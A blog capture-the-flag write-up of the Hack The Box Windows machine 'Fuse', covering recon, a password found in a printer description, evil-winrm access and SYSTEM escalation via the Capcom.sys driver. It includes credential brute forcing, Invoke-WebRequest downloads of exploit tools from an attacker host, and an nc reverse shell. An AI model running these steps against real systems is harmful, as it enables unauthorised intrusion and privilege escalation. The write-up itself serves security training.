u915

Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Fuse

0 - Basic info

OS: Windows

IP: 10.10.10.193

1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 13:24 CEST
Nmap scan report for 10.10.10.193
Host is up (0.037s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-05 11:37:55Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/5%Time=5F2A970C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                                                                                                                      
Device type: general purpose                                                                                                                                                                                                               
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)                                                                                                                                                                         
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607                                                                                 
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)                                                                                                                                                                                                       
No exact OS matches for host (test conditions non-ideal).                                                                                                                                                                                  
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                                                                                       
                                                                                                                                                                                                                                           
Host script results:                                                                                                                                                                                                                       
|_clock-skew: mean: 2h33m00s, deviation: 4h02m30s, median: 12m59s                                                                                                                                                                          
| smb-os-discovery:                                                                                                                                                                                                                        
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)                                                                                                                                                              
|   Computer name: Fuse                                                                                                                                                                                                                    
|   NetBIOS computer name: FUSE\x00                                                                                                                                                                                                        
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-08-05T04:40:17-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-08-05T11:40:19
|_  start_date: 2020-08-05T11:26:09

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 312.28 seconds
nmap -Pn -n -sV --script vuln 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 13:41 CEST
Nmap scan report for 10.10.10.193
Host is up (0.039s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-05 11:54:59Z)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp  open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp  open  kpasswd5?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp  open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
3269/tcp open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/5%Time=5F2A9B0C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 377.36 seconds

The initial recon shows that it is a Windows machine. Due to the errors trying to navigate, I added to the /etc/hosts

#HTB
10.10.10.193 fuse.htb fuse.fabricorp.local

Searching inside looks like a printing service, inside I discovered the following users:

users:
pmerton
tlavel
sthompson
administrator
bhult

Enumerating a little more:

host -t axfr fuse.fabricorp.local 10.10.10.193
Trying "fuse.fabricorp.local"
Using domain server:
Name: 10.10.10.193
Address: 10.10.10.193#53
Aliases: 

Host fuse.fabricorp.local not found: 3(NXDOMAIN)
Received 38 bytes from 10.10.10.193#53 in 31 ms
; Transfer failed.

Nothing useful

nslookup
> server 10.10.10.193
Default server: 10.10.10.193
Address: 10.10.10.193#53
> 10.10.10.193
** server can't find 193.10.10.10.in-addr.arpa: SERVFAIL

Checking the smb ports

smbmap -H 10.10.10.193
[+] IP: 10.10.10.193:445        Name: fuse.htb

smbclient -L fuse.htb
Enter WORKGROUP\u915's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Nothing…

I was stuck for a while, then I tried to generate a custom wordlist using Cewl to bruteforce the smb with the previously found users:

cewl -d 5 -m 3 -w wordlist.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Using the custom wordlist with the MSF smb scanner:

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE          wordlist.txt     no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.10.193     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE          users.txt        no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts
   
   
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:< '

[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Great 2 successful attempts for the users bhult and tlavel. Using smbclient to login to the smb service:

msf5 auxiliary(scanner/smb/smb_login) > smbclient -L fuse.htb -U bhult
[*] exec: smbclient -L fuse.htb -U bhult

Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

So the passwords must be changed. I used the amazing password Pizza33:

smbpasswd -r fuse.htb -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult

Pizza33

But did not work !

session setup failed: NT_STATUS_LOGON_FAILURE

So re-thinking again I put my effort on the rpc services:


rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

Also, the password is reset by an unknown period of time :(

rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 
result was WERR_INVALID_NAME

2 - Vulnerability Identification

Finally I discovered something useful enumerating the printers:

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

Great the firts Password:

$fab@s3Rv1ce$1

Now I need a valid user to use the password using again the discovered users with MSF and WinRM:

msf5 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\svc-print:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKGROUP        yes       The domain to use for Windows authentification
   PASSWORD          $fab@s3Rv1ce$1   no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            fuse.htb         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         users_rpc.txt    no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

SAD because nothing worked…

3 - Exploit

I was hitting the wall with my head and then I tried to manually use the user/password one by one….

evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Desktop>

Ok, now worked after a long pain but I still don’t know why the scanner did not work…maybe something was bad inside the Kali Linux version of msf5 auxiliary(scanner/winrm/winrm_login).

Who knows ?…User flag done.

*Evil-WinRM* PS C:\Users\svc-print\Desktop> ls


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/5/2020  12:10 PM             34 user.txt<  


a5dc[.....]e435

4 - Post-Exploitation and privilege escalation

Ok, so now only root is remaining…

After a well deserved break I started to enumerate more:


*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Something caught my attention…because a generic user like svc-print is strange to have the privilege to load drivers inside the system.

SeLoadDriverPrivilege

This privilege can be used to load evil drivers:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-eescalation/

This time I used the driver capcom

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

https://github.com/TarlogicSecurity/EoPLoadDriver/

https://github.com/tandasat/ExploitCapcom/tree/master/ExploitCapcom

I manually edited and compiled the exploit with VisualStudio. The key is using the exploit to elevate privileges.

then I used python to serve the exploit and files to the machine:

python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...

I used this time C:/Windows/Temp to store the exploit, was tricky because I can write and execute but not read… Also tried to spawn a root shell with the exploit without success. In addition, this time the machine was unstable or something was bad because I could not use the exploit so… I wrote my custom script(.bat) to generate a reverse shell to my machine using a precompiled version of nc:

Editing the line 292 of the ExploitCapcom.cpp to use my shiny bat:

TCHAR CommandLine[] = TEXT("C:\\Windows\\Temp\\launch.bat"); 

The basic idea is to recover again the files to the path C:\Windows\Temp

Invoke-WebRequest 10.10.14.8:8002/Capcom.sys -UseBasicParsing -OutFile C:\Windows\Temp\Capcom.sys
Invoke-WebRequest 10.10.14.8:8002/EOPLOADDRIVER.exe -UseBasicParsing -OutFile C:\Windows\Temp\EOPLOADDRIVER.exe
Invoke-WebRequest 10.10.14.8:8002/ExploitCapcom.exe -UseBasicParsing -OutFile C:\Windows\Temp\ExploitCapcom.exe
Invoke-WebRequest 10.10.14.8:8002/nc64.exe -UseBasicParsing -OutFile C:\Windows\Temp\nc64.exe

and use the loader to generate the service:

Invoke-WebRequest 10.10.14.8:8002/Capcom.sys -UseBasicParsing -OutFile C:\Windows\Temp\Capcom.sys
Invoke-WebRequest 10.10.14.8:8002/EOPLOADDRIVER.exe -UseBasicParsing -OutFile C:\Windows\Temp\EOPLOADDRIVER.exe
Invoke-WebRequest 10.10.14.8:8002/ExploitCapcom.exe -UseBasicParsing -OutFile C:\Windows\Temp\ExploitCapcom.exe
Invoke-WebRequest 10.10.14.8:8002/nc64.exe -UseBasicParsing -OutFile C:\Windows\Temp\nc64.exe

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Windows\Temp\Capcom.sys
.\ExploitCapcom.exe

This time worked:

*Evil-WinRM* PS C:\Windows\Temp> ./downloader.ps1
The process cannot access the file 'C:\Windows\Temp\Capcom.sys' because it is being used by another process.
At C:\Windows\Temp\downloader.ps1:1 char:1
+ Invoke-WebRequest 10.10.14.8:8002/Capcom.sys -UseBasicParsing -OutFil ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001DAE8910008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And my nc listening just poped out with the root connection from fuse :P

nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.8] from fuse.htb [10.10.10.193] 49813
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\Temp>whoami
whoami
nt authority\system


C:\Users\Administrator\Desktop>type root.txt
type root.txt
bf184[.....]15d88c

This machine was hard for me because I was not familiarized with the drivers permissions, so this time the enumeration and foothold was hard… but u know sometimes trying hard works.

Thanks for reading!